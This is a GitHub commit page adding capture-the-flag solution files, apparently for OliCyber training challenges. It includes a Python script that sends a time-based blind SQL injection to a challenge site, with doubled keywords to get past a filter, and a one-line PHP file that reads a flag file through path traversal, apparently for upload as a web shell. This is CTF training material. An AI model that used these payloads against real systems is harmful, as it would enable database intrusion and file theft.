Skip to content

Commit

Permalink
new challs
Browse files Browse the repository at this point in the history
  • Loading branch information
cibecs committed Oct 12, 2023
1 parent 2ae383a commit 8ecf920
Show file tree
Hide file tree
Showing 5 changed files with 23 additions and 1 deletion.
1 change: 1 addition & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
rockyou.txt
1 change: 0 additions & 1 deletion intoLinuxRabbitHole.py
Original file line number Diff line number Diff line change
Expand Up @@ -19,5 +19,4 @@
break

i += 1

r.interactive()
19 changes: 19 additions & 0 deletions noTime.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
import requests
import re

#La mail è stata inserita nel database!
#è già presente nel database!

url = 'http://no-time.challs.olicyber.it/'

s = requests.Session()

payload = "aaaa' and 1=0 -- "

data = {
'email' : payload
}

data1 = {"email": f"aaaaa@gmail.com' UNIUNIONON SELESELECTCT SLEEP(1) FRFROMOM information_schema.tables LIMLIMITIT 1 OFFSOFFSETET 1 -- -"}
r = requests.post(url, data=data1)
print(r.text)
2 changes: 2 additions & 0 deletions shellRevenge2.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
<?php echo("Test") ?> <b>test</b>

1 change: 1 addition & 0 deletions shellsRevenge.php
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<?php echo file_get_contents("../../../../../flag.txt"); ?>

0 comments on commit 8ecf920

Please sign in to comment.